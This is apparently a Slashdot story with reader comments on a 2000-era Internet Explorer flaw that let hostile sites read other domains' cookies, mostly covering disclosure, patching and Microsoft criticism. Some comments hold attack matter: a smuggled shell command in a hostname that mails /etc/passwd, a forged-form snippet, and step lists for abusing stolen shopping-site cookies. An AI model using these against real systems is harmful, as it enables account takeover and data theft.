MSIE's Cookies Are Public

If you're using Microsoft Internet Explorer running on Microsoft Windows, turn off Javascript now. Your cookie file is readable by any hostile website. Or, if you'd like to see the security hole in action, leave Javascript on and check it out: "Open Cookie Jar." (read more)

Peacefire webmaster Bennett Haselton is on a roll. After discovering yesterday's Hotmail hole, today he's published his discovery that MSIE's Javascript contains a bug that allows any hostile website to obtain your cookies.

Essentially the bug is that MSIE's Javascript is not very smart about determining which domain you're coming from. If the URL you're looking at has its "/" characters replaced by the hex representation "%2f", it can be fooled into thinking your path is actually a very long machine name. Because it interprets that path wrongly, a well-placed ".yahoo.com" in the URL can make Javascript think it should be using Yahoo's cookies - and Javascript can be told to deliver those cookies back to the hostile server.

Bennett and I believe the bug is confined to the Javascript code in MSIE, but we have not done extensive testing to determine this. For now, at least, we believe turning off Javascript will be sufficient to eliminate this security hole.

Or, you could migrate to another browser or operating system...

We have only tested this with IE 5, and Windows 95/98. Reports of success or failure with other versions would be welcome.

After Bennett explained to me how this works, I wrote a short CGI script to demonstrate what lurks in cookie files. Instead of silently stealing your private information and squirreling it away for later use, it echoes that information back to you (and then forgets it, of course). Updated: That script has been rewritten by and is now hosted at securityspace.com. For best results, first go log into amazon.com, type your zip code into hollywood.com, and visit playboy.com. Then go visit securityspace's general info page and click the "click here."

Newsbytes and CNET have picked up this story and have good writeups.

And then there's this...

[CloneRanger]

In the face of a government ordered breakup of Microsoft due to anti-competitive measures, Microsoft is doing it again. Microsoft has released the Internet Explorer 5.5 beta recently in order to solicit feedback. One of the new features in IE 5.5 is the integration of the MSN Messenger Service and Outlook Express. There doesn't seem to be a way to turn it off or to replace it with a competing Messenging Service such as ICQ or the AOL Instant Messenging service. I think we should give them some feedback.

IE 5.5 beta is affected

[blacksmith]

IE 5.5 beta on win2k doesn't fix anything - it still works fine.

1 click shopping (Re:And the paranoids...)

[Punto]

Therefore if I can steal the session ID for lets say Amazon I could send you $20000 dollars of books as a joke. That is not funny.

Of course it's funny.. you could use that _stupid_ "1 click shopping" with someone else's ID.. It'll be easy, fast, _and_ funny..

(of course, I think it's funny because I use Netscape..)

--

IE4 too

[pod]

Ditto for IE4 on NT4 (all patched up).

Re:ok, differentiate for me

[Black+Parrot]

> what is M$ bashing FUD and what is a valid opinion?

What really matters is, how long until a fix is out, and what other problems will the fix introduce?

--

Who wants to make someone loose all their karma?

[redback]

the first thing i did to test this was to log into slashdot with ie (i dont use ie, but its there) and check out my /. cookie, and i noticed that the user number is stored in plaintext (look harder its there) so i theory one could change it and troll with someones karma!

havent tried this though

Re:Has Peacefire reported this to MS?

[RayChuang]

A quick update: I did a "cut and paste" of the statement made by peacefire.org here on Slashdot and have sent it on to Microsoft's Security team as a high-priority mail message.

This has been around for awhile

[Once&FutureRocketman]

This bug has been known for at least a year and a half. Check this out.

Apparently not true

[Bob-K]

A post on the NTBugTraq list calls this story a "hoax". Perhaps that's overstating it, but it's a good example of the danger of jumping to conclusions.

The poster says that the demonstration script uses document.write to display the contents of a cookie in the browser window. Nowhere is it explained how the information might be transmitted back to the server.

I haven't investigated the code myself, just passing along the comments of others.

Re:Oh no!!

[Sloppy]

Mail it to your hotmail account. It will be perfectly safe there.

---

Re:uh, I think yes

[mcc]

you're forgetting about "gift shipments".

step 1: get person's cookie file
step 2: sign onto ecommerce service as person
step 3: change the person's default email adress with the service to a hotmail account (so they won't notice the "item hasbeen shipped" thing)
step 4: mail something, as a "gift", to a P.O. box. they will let you do this.

If you get lucky no one will notice. Scarily enough, this would work.

Re:The other problem

[jesser]

I also posted something on that article that got lost in the shuffle: a link to an old slashdot article about a CERT advisory. Among other things, the advisory asked webmasters to escape/reject all html coming from site users, even if only that one user sees the content.

Open-source webserver Apache fixed its 404 not found page to escape the name of the URL, but most dynamic websites still haven't fixed all of their code.

Coincidentally, I had just been reporting a bunch of bugs about bugzilla (mozilla's bug-tracking system) not being careful with untrusted data when these slashdot articles come up. I'm actually more worried about attacks against mozilla's CVS system than its against its bug-tracking system, but I haven't looked for bugs there yet.

--

DUH!

[Marc+Slemko]

Umh... if you are running arbitrary javascript that can display the cookie, then it doesn't take any genius to figure out how to send it somewhere! Like... load a URL on the attacker's server (or a free throwaway account) containing the value of the cookie.

Good manuscript for a movie?

[Slackadder]

Microsofts style of inventing, copyrights, market domination, "care" for customers and all the other nice stories they give us would be a good manuscript for makin one of these bad Hollywood movies about internet, hackers and big bad companies and all the other "scary tings" things they are having in these movies. At least this movie will have som relevance, because it has really happened.

In 10 years everyone will be laughing at Microsfts infantile, stupid inventions and copyrights.

With so many bugs, security holes and stupid copyrights, Microsoft is making fools of themselves. How much can IT-managers take before they turn to someone else? If that happens ./ users can start doing something more useful than complaining about software they are not using (ARE YOU???), more than they have to. Maby it won't be that amusing though...

Re:Virtual hosting and other problems for Apache

[RayChuang]

If this is occurring even on Apache, then we may have a MAJOR security problem here.

This could indicate that Javascript (or ECMA-242 script as it's sometimes known) in general can cause a security leak. They better start testing this on Netscape Navigator 3.x and all Netscape Communicator versions NOW to see if Netscape is also vulnerable to this bug.

Re:uh, I think yes

[Marc+Slemko]

Sure, maybe it will work on some sites. But that is due to other holes that they have. Try it on amazon.com. You won't get far, since they require you enter your password to do that.

You too can be a best selling author

[Camel+Pilot]

Heres How...

1. Write book ( Something catchy and trendy ie. "Whats good for MS is good for America" ).

2. Build a website to promote your book.

3. Scan for BN and Amazon cookies from those who visit your site.

4. Build a LWP Perl script and batch order copies of your book to those fools who visit your site with cookies enabled.

5. Collect your royalties and move offshore.

Re:Uh Oh

[ThesickAlienx]

I am not and advocate for MSIE, or even Netscape both are suck browsers...
However cookies are an integral part ("standard") of a browser. In fact did you know that the services at Hotmail, and Amazon (one click shop) wouldnt even work without the damn cookies?

I am sick of cookie bashers, however. Busting out all kinds of hysteria and privacy garbage. There is a bad side to every method. Including secure transactions. Why not just say it like it is for alot of crucial technologies on the net? why not state: "Did you know that every time you do a secure transaction you run a risk of a third party listening and taking your credit card number?" How about we just do a loud campaign that preaches to the world that there pocket book can be stolen if they use the web! Lets really shoot our foot boys!

If every one knew just how unsafe secure transactions are on the net, we would all be in alot of trouble, and possibly out of work in the long run.

Nothing is fail proof, or impossible to breach in our web medium... You should all know that by now.

Keep in mind As a developer sometimes there is only one way to go for a solution.. Technology will change and maybe get better but it wont ever stop the real "hardcore coder". Politics are at large and for now the powers that be are actually in our favor. So lets try and be "Nice" about what we do and say within our medium.

The Alienx

Call the repairman

[TopShelf]

your sarcasm detector seems to be on the fritz...

Impossible

[Legion303]

A truck-sized security hole in a Microsoft product? I won't believe that until I see it. Oh, wait...

-Legion

This is Illegal.

[Domini]

Please remove this exploit of Microsoft from slashdot, Microsoft would rather only let the dangerous criminals know of this, and not their general user base....
:)

Re:WRONG!

[TomV]

That's because you installed the Outlook fix after the Melissa virus came out. You do NOT have a default install of Outlook

This is not relevant to anything. If you built Slackware when it first appeared, and never installed any patches since then, then
1 - you have a 'default install of Slackware', and
2 - you've got more vulnerabilites than you've had hot dinners.

Failure to patch is not a failure of a given OS, it's a PEBCAK.

Go to www.microsoft.com, click on Subscribe from the blue bar near the top, and subscribe to the alerting services.

MS is far from perfect, but failure to automagically patch exploits that don't yet exist is not a valid line of attack against anyone

TomV

Re:And the paranoids rejoice!!

[gss]

someone could steal your slashdot.org cookie and wipe out all your karma by troll posting! :)

Re:UNIX _IS_ effected

[divec]

I just tried the test with IE 5 for Solaris

I didn't know there was an IE 5 for Solaris - is it better than IE3 for Solaris was?

Re:A potential sploit

[dragonfly_blue]

It's people like you that spoil perfectly good software patents for the rest of us! You outta be ashamed of yourself!

=P

Proxies protect?

[Pseudonymus+Bosch]

I have tried the demo by Jamie (go to Hollywood, etc.) and then a window opens with many frames. All contain "ERROR 205 -- DNS name lookup failure. Please contact your system administrator." from the proxy but for http:/ /www.securityspace.com%2fexploit%2fexploit_1e.html %3fa=.hollywood.com/ that has a Hollywood.com window saying "That user doesn't exist".

When I tried the box and button on Securi ty space, I get "www.slashdot.org's cookie is:".

I run IE 4.0 in NT and have Junkbuster set to allow cookies only to sites I trust.
I also have a company proxy to access the web.

__

ActiveCookie Technology (tm) ?

[lpontiac]

I can see this happpening sooner or later.

Just watch out, because in the distant future, you may bite down on a cookie and find a worm...

Paranoia

[mbell]

I just tested this with Windows 2000 running IE5. I saw my cookies from many web sites in a split second. This is sorta scary, but I'm really not so woried about it that I'll turn off javascript. If I did turn off javascript, it would break many sites that I frequent.

Sure, there could be some malicious code to steal cookies from me, but the chances are extremely small. First, the attacker would have to know what sites I have cookies from on my computer. Even if it did find those cookies, what is the worst it could do? Steal your hotmail account? (I'm sure they couldn't do THAT already). If you use cookies to keep track of really sensitive data, then its your own damn fault.

So, I'm not turning off javascript, and I'm sure MS will release some patch in a few days fixing this 'feature' of windows and ie.

-Mike Bell

No you don't :)

[spiralx]

The "hidden" troll forum is currently up to about post #2100, and all of them are genuine posts rather than bot-generated. So you still come in second with about 800 posts :)

Re:And the paranoids rejoice!!

[Sorklin]

Are you Bob Gobman of Anytown, USA? I'm John Smith! I live down on Peppermint Lane. We ought to get together some time for a phosphate.

Really?

[Pseudonymus+Bosch]

I haven't tried but I guess that it doesn't allow untrusted sites access to cookies. But what if a trusted site uses this exploit to access cookies from another trusted site?

I am confused.
__

Re:Really?

[Kris_J]

The default installation does not touch cookies, but it does have some wicked javascript filters. Sure, I get "errors", but I also avoid rollovers, popups and other annoying javascript cluelessness.

It's totally configurable, you can design any filters you want - but I'm so happy with the default that I just leave it at that. (particularly I like the agent and referer masking.)

Re:And the paranoids rejoice!!

[Bad+Mojo]

When it comes to Karma on Slashdot, it's the getting, not the having that matters. ;)


Bad Mojo

Re:Asking for Trouble

[dragonfly_blue]

Apparently, even the shiny new servers can't handle a direct blast from the death star.

Re:And the paranoids rejoice!!

[divec]

let Bob Gobman at 1 Happy St. get all the junk mail destined for me.

Yeah, I often wonder how much crap does get sent to The Queen, Buckingham Palace. It must be really annoying for her. (And of course she opens all her own mail, yeah)

if you are THAT paranoid about common public information, then DON'T POST YOUR REAL DATA!!!

That's all very well, but I don't want Bob Gobman to get my copy of "GTK+/GNOME Application Development".

Configuration problem

[lovebyte]

Typing this URL
http://somewhere.com/%2ftest.php3?q=8
replaces the %2f with a / on my apache server. That's all. I guess there is a problem with your apache configuration. Since you seem to be called Jonathan Clark and the URL apache returns for you contains /jc/, I guess that you have configured apache to go to your jc directory when the URL http://somewhere.com// is used. Just a guess.

Re:Configuration problem

[jonathanclark]

er.. the /jc/ was a typo on my part - it shouldn't be there.

As the other poster commented this isn't really a problem with apache, it's IE's fault. IE thinks the hostname from the URL includes the %2f %3f characters - and it's passing this to apache in the request header. What I thought was interesting is the fact that apache unescaped the string. This means that there might be security holes in CGI scripts that expect hostname strings to be safe.

For example if the unescaped hostname looks like this:

somewhere.com;`mail s@s.com /etc/passwd`

and some CGI script does something like this:

nslookup $HOSTNAME

you've got a big problem!

Re:Configuration problem

[Ben+Hutchings]

No, IE is correct to do this. This is exactly what the %-sign is for - escaping characters that have special meanings. For instance, a Mac web server could have a slash in its filenames, and you would have to write this slash as %2F in the URL for that file so that it isn't interpreted as a directory separator. (Of course, there's no real use for this when it comes to hostnames.) But it should pass exactly the same host string to the resolver, and yet it appears not to have done so. This, I think, is the real bug that leads to this security hole.

Re:Microsoft Bugs: Not Just For Windows Anymore

[frankie]

If anyone actually uses this on HP or Solaris (or Mac?) you may want to check the referred-to test pages

IE 5 Mac is immune as far as I can tell, but it's not from the same code base as IE Win.

By the way, M$ bugs have been affecting Macs for a while now -- Macro viruses.

The website (Slashdot) shoud refuse the GET method

[cyberdonny]

This attack only works because Slashdot excepts comments submitted using the GET method, rather than POST, which is normally used for forms. This is a very common error unfortunately... Let's just hope that stock trading sites such as E*Trade are more careful about which methods they accept for their forms, or else somebody could abuse this to perform the mother of all stock manipulations. Conceivably, such a poisoned link could be hidden in a < img src="..."> tag, and nobody would even notice...

Re:turning off one-click is not safe...

[biafra]

mikemulvaney wrote
The #1 feature I want in a browser is a check box that says "Delete all cookies when quitting browser". Actually, I would really love more fine-grained control, but just this one feature would be enough.

Very simple solution to that one....
bash: ln -s /dev/null ~/.netscape/cookies
This way cookies are stored in memory for the life of the browser session, and sent to the bit bucket when you close netscape. Of course this assumes that you are useing NS under some sort of *NIX.

no major virtual host problems.

[Marc+Slemko]

What are you talking about? "javascript in general can cause a security leak"? Huh? You don't make any sense. This has nothing to do with "javascript in general" and is 100% an IE implementation bug.

The only bug here is that you can make IE make requests with a Host: header that doesn't really resolve to the machine in question. So sure, there is some risk of cookies being exposed to the default vhost on a server when they should only be sent to a particular vhost, but that is a comparitively tiny risk.

But Navigator has a far bigger problem (allowing you to embed CRs and LFs within HTTP requests) that lets you do this or more. I posted about this some time ago on bugtraq. Unfortunately, Netscape doesn't give a damn. If you are looking at response to security issues, no matter how bad MS is, Netscape is 100 times worse. Combine a company with no direction and not much in the way of a production plan with most clueful employees having bailed out, with the remaining ones just not giving a damn... and that is what you get.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Microsoft Bugs: Not Just For Windows Anymore

[oh6062]

The bug certainly doesn't affect my OS8.6 Mac running IE5, but (obviously) it works in IE5 in Virtual PC 3.

God, I hate Microsoft. They have feature sets I find really useful that other apps can only dream of (Office 98 vs Appleworks 6...), and then they screw it all up with these bugs... Aaarrgghhhhh!!!

Comment removed

[account_deleted]

Comment removed based on user account deletion

turning off one-click is not safe...

[mikemulvaney]

Even if you turn off one-click, the person who stole your cookies can just turn it back on.

The #1 feature I want in a browser is a check box that says "Delete all cookies when quitting browser". Actually, I would really love more fine-grained control, but just this one feature would be enough.

I am aware that Opera has this feature.

Mike

Re:turning off one-click is not safe...

[Frank+T.+Lofaro+Jr.]

Here's how to have cookies not persist beyond the end of a session when using Netscape under Windows NT.

attrib +r c:\Program Files\Netscape\Users\YourProfile\cookies.txt

(using the actual path on your machine, of course).

You can use attrib -r to undo it. Like store your slashdot cookies by having it writable when you log in, then make it read only again. Very useful.

Re:turning off one-click is not safe...

[mantis_p]

"The #1 feature I want in a browser is a check box that says "Delete all cookies when quitting browser". Actually, I would really love more fine-grained control, but just this one feature would be enough."

You should try installing something like GuardDog. It allows you to review all of the cookies placed on your machine when you close your browser and lets you delete certain ones or delete all of them. It is pretty killer. I love it.

~m(antis)

Re:turning off one-click is not safe...

[Marc+Slemko]

Take a look at amazon's site. You can not enable one click ordering without knowing your password. You also can't do most account related things without knowing your password. This is done by Amazon on purpose.

Now, they _did_ have some pretty gaping bugs in this area a few months ago that let you bypass this. I pestered them enough and they eventually fixed them though.

Also note that one click ordering really isn't all that dangerous. It is more of an inconvenience. So what is the worst that can happen? You can get some item sent to you that you have the hassle of returning. You can't send it to a different address. You can't obtain the credit card info. etc.

Re:M$ caught in the cookie jar? again?!

[B'Trey]

Can someone explain this to me? I'm running Windows 2000, using IE 5.00.2920.0000. I'm also running Junkbuster. Going to http://www.holocaust-his tory.org/~jamie/iecookies/test.cgi, I get this result:

This exploit only works on Microsoft Internet Explorer running on Microsoft Windows. Your user-agent is Mozilla/3.01Gold (Macintosh; I; 68K), so you would not be affected.

I can understand that Junkbuster, blocking cookies, might prevent the exploit from working, but I don't understand why the site thinks I'm running Mozilla on a Mac?!?!?

Not Jesse, but Linux!

[nevets]

A user's Playboy.com cookie stores the fact that the user has visited Playboy.com -- which not every Playboy visitor would want the whole world to know. (Yeah, we know, you just wanted to read the Jesse Ventura interview)

Actually, I wanted read the articles about Linux.

Steven Rostedt

Re:Wish I could red the linked article

[Alanzilla]

I would quit my job immediately if my employer installed filtering software. For God's sake, why would an employer want to forbid their employees from educating themselves?

It's mostly to stop the idiots in sales from surfing for pr0n.

How to Break Up M$

[markwild]

Just my two cents on the Microsoft Breakup. . . I can't help but think that John Dvorak had the right idea when he said that the way to break up M$ is to split them down the middle. Just like in sandlot baseball, Steve Ballmer and Bill Gates will be team captains, then choose employees from each division right down the middle. They'll each have their own company: M$ Red will be Gates', and M$ Blue will be Ballmer's. Now, LET THESE TWO COMPANIES COMPETE WITH EACH OTHER. You wanna see some real competition? You wanna see some real innovation? You wanna see some less buggy products coming out of Redmond (or Bluemond)?? Split 'em in two and let them have at it!!

Uh Oh

[finkployd]

Revealing proprietary, trade secrets on a public web site? Let's face it, this is MS, there is no way this is a security hole, they are too "innovative" for that kind of sloppy work to get through. This must be a special "enhancement" they made to the way javascript works, and as such, is covered under the DMCA.

I'll be it's another letter for you guys :)

Finkployd

Re:Uh Oh

[gilroy]

Quoth the poster:

However cookies are an integral part ("standard") of a browser. In fact did you know that the services at Hotmail, and Amazon (one click shop) wouldnt even work without the damn cookies?

Yet another reason I don't use Amazon.com anymore. Sites that use cookies need to be explicit about why and how, and then the user could (grudgingly) allow certain ones, from trusted sites, to be set. I complained not long ago to staples.com, and actually received a response indicating that the privacy concerns are forcing them to re-think their requirement of cookies. Maybe there's more hostility than we thought...

Also quoth the poster:

There is a bad side to every method. Including secure transactions.

But you can choose methods that minimize the "bad side" and make it hard to exploit, rather than (as here) relatively easy.

And yet more from the poster:

If every one knew just how unsafe secure transactions are on the net, we would all be in alot of trouble, and possibly out of work in the long run.

Does your personal code of ethics really say that you should keep quiet about known dangers because it might affect your earning potential? How ruthlessly pragmatic! Or... we can raise a ruckus over these sorts of too-simple exploits and, through the glare of publicity, perhaps encourage the people involved to design better products.

Re:Uh Oh

[ThesickAlienx]

TO best describe my personal code of ethic's read on: "As builders and developers, we know the threats to security, and we constantly work for better security on system's." It's the idea of publicising and making problem's utterly public that can prove to be dangerous. Take for example the recent love bug. One came out then 20 more were made over night. Maybe many more would have been made if we went and put the source code on a highly visible site.

Re:Uh Oh

[gilroy]

Quoth the poster:

Take for example the recent love bug. One came out then 20 more were made over night. Maybe many more would have been made if we went and put the source code on a highly visible site.

Or maybe, if the Outlook code were open-sourced, overnight a fix and patch would have been developed and distributed... in fact, if the Outlook code were open-sourced, maybe the bug would have been found and fixed before it allowed hundreds of millions of dollars to be lost to productivity shutdowns...

Re:Uh Oh

[MicroBerto]

Haha.. It seems that Microsoft has been taking HIT AFTER HIT from everyone.... and i LOVE it!

How long is it going to take the public to realize who's the peoples' king, and who's the oppressor? I hope the good news keeps on comin in.

Mike Roberto (roberto@soul.apk.net) -GAIM: MicroBerto

Re:WRONG!

[qnonsense]

That's because you installed the Outlook fix after the Melissa virus came out. You do NOT have a default install of Outlook. The default install of Outlook runs the script just by VIEWING the the email.

Just Wondering

[arthurs_sidekick]

... whether peacefire.org is going to get threatened by Microsoft under the DMCA for releasing these "trade secrets" ?

OK, here ends the simple "anti-MS" part of the post (fun though it was for me). Please, folks, let's just look at this as simply a data point and a public-service announcement. Yes, it's a hole in IE; it's a safe bet that every significant piece of software's got holes.

Let's see how fast MS is able to get a patch out; this one's big enough for them to really worry.

on cookies and security

[Marc+Slemko]

Cookies are not secure and will never be secure.

First, ignore all the silly ranting about not being encrypted, etc. That has nothing to do with the issue. You can send cookies over SSL connections. You can set cookies that will only be sent over a SSL connection. etc. This type of cookie stealing problem is far easier to exploit than having to compromise the network over which traffic is flowing. That is a completely different attack that allows you to do a whole lot more than just steal cookies.

This particular vulnerability isn't actually all that "serious" in terms of new exposure. Lets look at the examples given on the page describing the exploit. hotmail, yahoo mail, amazon.com, etc... cookies for all those sites, and probably for every other site listed, are stealable anyway due to the so-called "cross site scripting" issue.

I have spent a lot of time with these issues and related ones over the past few months. By their very nature, cookies are not treated as confidential by the browser and are far too accessible. The only way to get rid of the problems that using cookies for authentication or private information have is to replace them with a mechanism that is designed from the ground up to protect that information.

Unfortunately, from the perspective of a web site creator, there are very very limited alternatives. HTTP basic authentication has its own problems, using SSL client side certificates has its own problems, MD5 digest auth has its own probems, etc. There is no current method that avoids all, or even most of, the problems. All you can do is manage your risk.

Some day I plan to write a document describing the various risks associated with authentication schemes and what can be done to minimize them, but that takes time...

This is not new...

[Anonymous+Elf]

As a young elfing, I've always had to defend my cookies from hoardes of thieves, trolls, and neerdowells. If you don't protect your cookies, they will be stolen.

Hilarious!

[Anonymous+Shepherd]

ROTFLMAO

OMG. I just can't help thinking 'This is the value of M$'s integration with the OS'

It makes the Internet all that much closer to you, as well as your machine:in both directions.

Well, maybe the above thought is incorrect.

Anyway, I'm thinking something blasphemous. M$ complains that splitting it up will hinder it's ability to 'innovate' and 'compete'. Isn't that the point? If M$ can't expect to release a decent Office or X-Box or IE without access to the OS group, how is Netscape, or Corel, or anyone else expected to 'innovate' and 'compete' if M$ cannot?

There are people complaining about how breaking up M$ is bad, but I'm wondering, if M$ restructures itself in such a way that the OS department can still freely communicate with the Apps department, but in a way that is public and open, doesn't *everyone* win?

-AS

Re:Hilarious!

[MrHat]

ROTFLMAO. OMG. I just can't help thinking 'This is the value of M$'s integration with the OS'.

If you really want to die of laughter, check out Time's latest piece, which includes a "viewpoint" by Mr. Gates, defending the very integration you speak of.

My personal favorite from Gates: "Updates to Windows and Office technologies that could, for example, protect against attacks such as the Love Bug virus would also be much harder for computer users to obtain."


43rd Law of Computing: Anything that can go wr

Re:Hilarious!

[Oarboat_7]

Corel can't even write native Linux code of their bigger products. Instead, they're dragging Windows (wine) along with their apps onto Linux. Similar, of course, to what Microsoft did to get IE on Unix systems.

Netscape hasn't been that bad. At least they port to many OSes.

Re:Hilarious!

[Sabalon]

OMG. I just can't help thinking 'This is the value of M$'s integration with the OS'

This makes no sense. Even if it were not intergrated with the OS and was a freestanding app, this hole would still be present.

I don't agree with the breakup, however, the open communicae between the OS and APPS would help.

Re:oh give me a break

[ichthus]

I'm sure Microsoft will patch this hole soon. And yes, Slashdotters are critical of Microsoft. But come on. Melissa, ILOVEYOU, etc. THIS IS A SECURITY BUG, the only fix for which has been to 'educate users not to run executable attachments.' This is a bunch of crap. Where's the REAL fix? Where's Microsoft's patch for this? Melissa would still be just a devastating today.

Automobile manufacturers don't just rely on driver education to increase vehicle safety. They install seatbelts, airbags, door-beams, etc. because lives are at stake. Likewise, Microsoft needs to revise its product. $Billions are at stake, not to mention privacy.

You may be tired of the Slashdot/Linux community's critical attitude toward Microsoft. I'm sick of Microsoft's cavalier attitude toward security and reliability.

Look Ma! Another Microsoft Innovation!

[Alien54]

I am just trying to think of how Mico$oft marketing will try to explain this as a feature....

Could a breakup help

[FoulBeard]

Ahem..Crash Me, Mellisa, ILoveYou, Hotmail, now this. Leave it to Microsoft to bring innovative new ways to lose all sense of privacy. Seriously though maybe this is an artifact of M$ getting to big? I am a pretty forgiving guy, but they are making to many mistakes for even me to overlook.

Maybe a breakup is a good thing. Its about time that Micorosoft re-discovers the meaning of the words, pride.. integrity.. fun.. innovation.. excellence. Instead of of their usuall fair which consists of market capitialization, share value, PR, equity.

Microsoft has alot of good people working for them, and I have had the pleasure of working with some of them. To bad the company's sense of responsibility, and integrity is off smoking a $3 sack of crack.

My humble opinion.....
-Nathan

Re:And the paranoids rejoice!!

So...you don't want to purchase that car because it has bad brakes?????

OH GOSH..why can't you just drive on the back roads and never go over 20 MPH... or are you in THAT much of a hurry?????? I never go over 15 mph and I've never had any problems stopping my car.

Is it just me or do people find reasons to get all up in arms for nothing. For all of you who will respond that this is a big deal, remember nobody is FORCING you to drive at speeds over 15 mph, so there is no reason to ever worry about having bad brakes on your car.

cookies were NEVER secure

[consumer]

Anyone with a packet sniffer can see your cookies. They are not normally encrypted. Web developers should not be putting sensitive information in cookies or using cookies as the only verification needed for secure tasks, like on-line purchases. Sites like Yahoo are very careful to require a password before letting you edit sensitive data, even if you have a cookie.

With a policy like that, it really doesn't matter if the entire world looks at your cookies.

Re:cookies were NEVER secure

[mohrt]

What does this have to do with cookies? If you are not on an encrypted connection such as SSL, you can pick up *any* traffic with a sniffer, regardless if it is cookies are not. This does not condone cookies as being any less secure than any other data sent through the network.

Re:cookies were NEVER secure

[mohrt]

I believe it is. Although, there are tricks to get around this, like using javascript to first encode the password before sending it across. Not a perfect solution, but it makes those passwords harder to detect with a sniffer.

Re:cookies were NEVER secure

[Camel+Pilot]

Well if you have a packet sniffer on a lan or wan cookies would be one of the least significant data items you can receive (such as clear text passwords, cc numbers or whatever is being transmitted in the domain you have access to). Right ? or am i missing your point.

Re:cookies were NEVER secure

[Oarboat_7]

So, is the password that Yahoo requests being send over the wire as plaintext?

Hmmm.

microsoft innovates - yeah right

[lanman5000]

I love it when M$ products have problems. It's one of the only ways the public can see how crappy their software is. Just compare the win95/98 crash rate with the linux crash rate. Win sometimes crashes 1-3 times a day, and linux has been known to run crashless for over a year. I can't wait till the day people will find that most of the competing products are ACTUALLY BETTER! Win2k Dataserver has very high specs, like the ability to handle up to 64G ram and 32 cpus. But if you think about it, which is better: a crash-prone closed source NT5 system with high specs and a budget-crushing price tag, or a crash-free open source linux system with lower specs and no price tag? Linux will eventally support even more stuff anyway.

Re:microsoft innovates - yeah right

[Falcula]

The problem is most users don't see the problems whether through desensitization or just not knowing that computers don't need to be rebooted every day or two.

I read an article once where one guy said that he thought windows products were getting better and better until he realized it was just Pavlovian conditiong to stop hitting ctrl-v and instead select paste from the edit menu because the hotkey combo crashed the program. After awhile you don't even remember there should be an easer way to do things, you just do them in the way they work.

Re:And the paranoids rejoice!!

[nEoN+nOoDlE]

well I hope bgates@microsoft.com is enjoying the spam meant for me. hehe.

M$ breakup

[jhittner]

Nextthing you know Bill Gates will be saying that things like this will be worse if they breakup Microsoft, just like he said about the ILOVEYOU worm

no.

[phossie]

no. read the article.

cookie paranoia

[mohrt]

Great, now this just amplifies the general concern about the security of cookies, even though it is entirely at the fault of the MSIE browser.

alright, I will

Linux security is strengthened...
Microsoft security is to be made fun of...

Microsoft security is a laughing (or crying) matter in a public forum simply because the discussion will most likely have no effect on the software in question, whereas Linux (or any other OSS) can, and probably will, be patched relatively quickly after the discovery of a similar problem.

Jamie's commentary is put into perspective by his understanding of the problem at hand and MS's history of related problems (hell, recent history even). On the other hand, if you disregard someone's opinion on the basis of their rhetoric, especially within this community, you may be missing some excellent technical viewpoints.

Re:No big deal..

[aziraphale]

Hmm. Worse still, I'm guessing that a lot of people use the same password on all the sites they're registered with, because remembering multiple passwords is a pain.

That would mean that if a site can collect a cookie from someone who stores the password clientside using some lame - and known - encoding, they could try it out on a few more serious sites that just use the old random number trick. There's gotta be at least an even chance of them being able to get in.

Re:Didn't work for me.

[TomV]

I tried it with NT4SP3 IE4 and it worked

What is this obsession with testing heavily obsolete versions for these exploits. I was under the impression that one of the major benefits of OSS is the rapid availability of, and ease of implementing, patches.

And yet this principle seems to be rarely applied to other (non-OSS) s/w. In this case we're looking at a version of NT4 (still the main NT, really, W2k notwithstanding) at SP3 when SP6 has been out for months, running IE4 when IE5 is a year old now.

MS do not charge for patches or SP's. They run a variety of alerting services from www.microsoft.com, and while they don't always patch everything as fast as they should, they do inform you as soon as the patches are out, IF you can be bothered to subscribe to the alerts.

Double Standards, basically.

TomV

please don't post fake "fixes"

[Marc+Slemko]

Oh yea. Your page boils down to "letes invent a new very weak encryption scheme". Then you explain why encrypting the username and password don't do much good (ie. if they are what authenticates the user, then any user who gets that info is authenticated as the user) while ignoring the little point that your magic scheme suffers from the same problem!

It is pretty obvious that you can and should do something other than just sticking the password in a cookie, and most sites do. Then many sites, such as Amazon, still require you to enter your password before doing "important" things.

Thanks, but no thanks.

Re:UNIX _IS_ s/e/a/ ffected

[bjb]

It runs like poop. Yes, it's better than IE3 or IE4 for solaris (the latter being able to bring the X server to its knees it was so bad), but it still has all the little annoying "features":

• Bringing a window to front when you don't want it to
• Causing your X server to groan under the stress of code not written with X in mind
• No proper java (actually uses appletviewer which is a debatable good/bad)
• Editing options is PAINFULLY slow even on a fast machine

Fun.

--

Re:WRONG!

[Steeltoe]

"MS is far from perfect, but failure to automagically patch exploits that don't yet exist is not a valid line of attack against anyone."

I'm glad those people making UNIX didn't say the same.. Take care!

- Steeltoe

Ah, but you missed a big point...

[hey!]

What about Intranets? Companies are using these for a lot of things now, including sensitive strategic and HR data.

Now anytime a boss visits a hostile web site, he may be giving away the keys to the company's proprietary data. Even if personal web sharing is not allowed, a hostile employee and and outside confederate could easily stir up a lot of trouble.

Re:The website (Slashdot) shoud refuse the GET met

[c+era]

The GET vs POST doesn't matter, you can still send information in a POST method with a click.

<form name=some_form>
<input type=hidden name=info value=info>
&lt/form>
<a href="javascript:document.some_form.submit()">clic k here </a>

Slashdot Cookie

[jbarnett]

Test your for your Slash Dot Cookie

Mine was choclate chip Mmmmm

Lost functionality isn't worth it

[ionpro]

HTML adds a lot of functionality to a poster. Perhaps it can be dangerous - that is what moderation is for. However, a lot of things can be looked for; especially javascript event handlers and such. I like being able to add emphasis and properly underline text (unfortunitely not allowed by slash), and bold is also useful for some things.

I can edit your blog.

[eric.costello]

To help prove how serious this security hole is, I have set up the following demonstration. You must be using IE, and have checked "remember me" when you logged on to Blogger, or have logged on (and not off) to Blogger in your current browser session.

1. Go create a new account at http://www.blogger.com (unless you want me to mess with your real account), check "rememeber me" when you log on.
2. Create a new blog, enter you FTP password if you want me to be able to actually publish changes I make.
3. Add a blog entry that says you want me (Eric Costello) to add an entry to prove I was there.
4. Go to http://www.glish.com/cookies.html.

I will get your cookie info and will soon have access to your blog. I have confirmed this works by hacking into pixelpony's blog.

Re:I can edit your blog.

[Marc+Slemko]

You don't need a bug in IE to do this. The 404 error page on www.blogger.com is vulnerable (the default 404 page on IIS5 is, or was, vulnerable), so any browser with javascript (or other scripting languages, or even some without) is vulnerable through "cross site scripting" exploits.

So, as I said before, sure this bug in IE is a pain but it isn't all that significant compared to the known issues out there...

InterMute blocks cookies

[PerlDiver]

Intermute selectively blocks cookies by domain name (e.g., you can tell it to block all cookies, and then specify exceptions for sites that need them).

